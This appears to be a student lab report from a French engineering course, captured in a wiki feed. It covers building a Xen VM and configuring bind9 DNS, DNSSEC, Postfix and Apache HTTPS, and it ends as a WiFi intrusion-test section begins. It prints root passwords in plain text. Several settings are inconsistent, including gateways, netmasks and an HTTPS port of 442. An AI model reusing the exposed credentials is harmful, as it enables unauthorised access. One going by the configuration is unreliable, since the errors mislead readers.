		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54021"/>
				<updated>2020-11-27T19:34:04Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Architecture réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. &lt;br /&gt;
&lt;br /&gt;
Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK).&lt;br /&gt;
&lt;br /&gt;
Puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
